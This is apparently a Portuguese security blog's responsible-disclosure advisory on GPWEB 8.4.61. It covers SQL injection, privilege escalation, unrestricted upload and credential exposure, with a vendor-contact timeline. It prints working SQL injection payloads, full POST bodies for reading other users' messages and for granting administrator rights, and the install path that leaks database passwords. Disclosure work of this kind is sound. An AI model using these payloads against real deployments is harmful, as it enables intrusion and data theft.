Publicado em 12 de dezembro de 2017
Segurança

Em outubro deste ano (2017), resolvi iniciar um projeto na área de pesquisa em segurança da informação. Selecionei vários softwares hospedados no repositório https://softwarepublico.gov.br, a fim de dar minha contribuição à comunidade encontrando possíveis falhas de segurança nos projetos disponibilizados publicamente. O primeiro deles, foco desta publicação, é o GPWEB 8.4.61, sendo esta a última versão disponível desde outubro de 2016. CVEs relacionados a estas descobertas: CVE-2017-15875, CVE-2017-15876 e CVE-2017-15877 .

Segue abaixo o propósito do software segundo o fabricante:

O software gpweb entrega gestão estratégica e gerenciamento de projetos orientados a processos de padrão mundial, adaptados às necessidades da sua organização. Projetado para gerenciar o planejamento estratégico e todo o ciclo de vida de seus projetos, o gpweb fornece soluções construídas sobre poderosa capacidade de colaboração e de fluxos de trabalho.

De acordo com o próprio fabricante, o GPWEB é usado por diversas empresas privadas e órgão do governo como Força aérea Brasileira, Exército Brasileiro, Tribunais de Justiça, Tribunais Regionais Eleitorais, CREAs, Universidades e Ministérios Públicos.

Sendo a versão 8.4.61, a última disponível para o público, várias instituições estão em risco, pois as falhas encontradas nesta versão possivelmente também estão presentes em versões anteriores. (Não confirmado)

Ainda em outubro/17, logo após as descobertas, o fabricante foi comunicado a respeito delas, o qual se prontificou em analisar cada falha encontrada. Segundo ele, uma nova versão irá ao ar em Janeiro/18, corrigindo as falhas apontadas.

Abaixo, segue relatório descrevendo as falhas encontradas e também o histórico de ações desde a descoberta das falhas:

 

Detalhes sobre o produto / serviço

Fabricante: Sistema GP-Web Ltda.

Site: http://www.sistemagpweb.com.br

Produto: GPWEB – Grandes Planos | Disponível em: https://softwarepublico.gov.br/social/gpweb

Versões afetadas: 8.4.61 (Possivelmente todas as versões anteriores também possuem as mesmas falhas)

Impactos

GPWEB 8.4.61 SQL Injection CVE-2017-15875

GPWEB 8.4.61 Manipulação Privilégios

GPWEB 8.4.61 Uploads Sem Restrição CVE-2017-15876

GPWEB 8.4.61 Exposição Informação Sensível CVE-2017-15877

 

Detalhes das vulnerabilidades

SQL Injection

O campo de recuperação de senhas é vulnerável à SQL Injection.

Para submissão do pedido de reset de senha é usado o método POST. Os seguintes campos são enviados na requisição:

celular=0&perdeu_senha=1&pesquisa_email=1&pesquisa_frase=0&gravar_senha=0&usuario_id=0&[email protected]

O campo checkemail é vulnerável às sequintes técnicas:

Type: boolean-based blind

Title: AND boolean-based blind – WHERE or HAVING clause

Payload: celular=0&perdeu_senha=1&pesquisa_email=1&pesquisa_frase=0&gravar_senha=0&usuario_id=0&[email protected]’ AND 2665=2665 AND ‘MIpz’=’MIpz

Type: error-based

Title: MySQL >= 5.1 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)

Payload: celular=0&perdeu_senha=1&pesquisa_email=1&pesquisa_frase=0&gravar_senha=0&usuario_id=0&[email protected]’ AND EXTRACTVALUE(3529,CONCAT(0x5c,0x717a6a6271,(SELECT (ELT(3529=3529,1))),0x71626a7171)) AND ‘NoaN’=’NoaN

Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind

Payload: celular=0&perdeu_senha=1&pesquisa_email=1&pesquisa_frase=0&gravar_senha=0&usuario_id=0&[email protected]’ AND SLEEP(10) AND ‘uUYt’=’uUYt

POC (Proof of Concept)

GPWEB 8.4.61 Database

 

Manipulação de privilégios

As seguintes manipulações de privilégios são possíveis:

  • Usuário com qualquer privilégio, manipulando requisição POST, é capaz de ler mensagens de outro usuário.

Um usuário com qualquer privilégio é capaz de manipular a seguinte requisição POST . Alterando-se o campo usuario_id para o id de outro usuário e alterando o id da mensagem a ser lida (msg_usuario_id).

a=exibe_msg&m=email&status=1&usuario_id=3&destino=&tipo=&mover=&pasta=&sentido=&campo_ordenar=&cia_usuario_enviou=0&cia_usuario_recebeu=0&cia_usuario_criou=0&assunto=&pesquisa_inicio=&pesquisa_fim=&tab=0&msg_usuario_id=1&senha=&modelo_id=&pagina=1&retornar=&cia_id=1&tarefa_id=&projeto_id=&pg_perspectiva_id=&tema_id=&objetivo_id=&fator_id=&pg_estrategia_id=&pg_meta_id=&pratica_id=&pratica_indicador_id=&plano_acao_id=&canvas_id=&risco_id=&risco_resposta_id=&calendario_id=&monitoramento_id=&ata_id=&mswot_id=&swot_id=&operativo_id=&instrumento_id=&recurso_id=&problema_id=&demanda_id=&programa_id=&licao_id=&evento_id=&link_id=&avaliacao_id=&tgn_id=&brainstorm_id=&gut_id=&causa_efeito_id=&arquivo_id=&forum_id=&checklist_id=&agenda_id=&agrupamento_id=&patrocinador_id=&template_id=&painel_id=&painel_odometro_id=&painel_composicao_id=&tr_id=&me_id=&cripto_1=0&caixa_senha=
  • Escalonamento de privilégios

Um usuário com qualquer privilégio é capaz de manipular requisições POST e se tornar administrador do sistema.

Fazendo-se a manipulação da seguinte requisição e alterando-se os dados de forma arbitrária para os seus próprios dados e mantendo-se no final usuario_admin=1 no próximo login deste usuário ele estará como administrador do sistema.

m=admin&a=vazio&u=&contato_posto_valor=19&usuario_id=2&contato_id=2&fazerSQL=fazer_usuario_aed&tam_min_login=2%29&tam_min_senha=2%29&usuarios=&depts=&usuario_grupo_dept=&usuario_chavepublica=&usuario_especial=0&usuario_superior=&usuario_superior=0&usuario_superior=&usuario_assinatura=&existe_login=1&nao_existe_dept=&existe_identidade=&usuario_login=teste&escolha_criar_contato=criar&contato_posto=Sr.&contato_nomeguerra=teste&contato_nomecompleto=teste&contato_cia=1&contato_dept=&dept_nome=%A0&contato_funcao=&contato_email=&contato_email2=&usuario_rodape=&contato_identidade=&contato_cpf=&contato_matricula=&contato_hora_custo=0&usuario_contato=&nome_contato=%A0&usuario_ativo=0&usuario_ativo=1&usuario_admin=0&usuario_admin=1

Uploads sem restrições

Usuários com privilégios de Administrador são capazes de editar informações de Organizações a qual permite upload de arquivos sem restrições.

GPWEB 8.4.61 Shell Upload

Carregando-se um arquivo malicioso, que permite execuções de comando em um servidor, é possível ganhar acesso e executar código remoto.

POC (Proof of Concept)

Após o carregamento de arquivo malicioso no servidor, é possível executar comandos e ganhar acesso ao servidor:

GPWEB 8.4.61 Execução de código

 

Exposição de Informação Sensível

Após a instalação do sistema, caso a pasta /instalacao/ mantenha-se no servidor, ao acessar o seguinte endereço, sem a necessidade de estar autenticado, informações de conexão com o banco de dados são expostas:

http://CAMINHO_GPWEB/instalacao/db.php

 

POC (Proof of Concept)

GPWEB 8.4.61 Acesso a instalacao/db.php

 

Ao inspecionar o campo de senha, ela aparece em texto claro:

GPWEB 8.4.61 Senha em texto claro

 

Histórico de ações

20/10/2017 – Início dos testes e criação do relatório.
22/10/2017 – Feito primeiro contato com fabricante / mantenedor informando o problema.
22/10/2017 – Fabricante confirmou recebimento do e-mail e irá avaliar.
24/10/2017 – Incluídos CVE-IDs para cada vulnerabilidade.
30/11/2017 – Fabricante informado que descobertas iriam a público em dez/17.
12/12/2017 – Publicação das descobertas.

 

Referências

https://softwarepublico.gov.br/social/gpweb

https://softwarepublico.gov.br/social/profile/gpweb/plugin/software_communities/download_file?block_id=2667&download_id=42&title=Baixar+o+software

por
3
Publicações relacionadas
11 de dezembro de 2017
Desenvolvimento web, Segurança
5 de dezembro de 2017
Desenvolvimento web, Segurança
WhatsApp Fale comigo!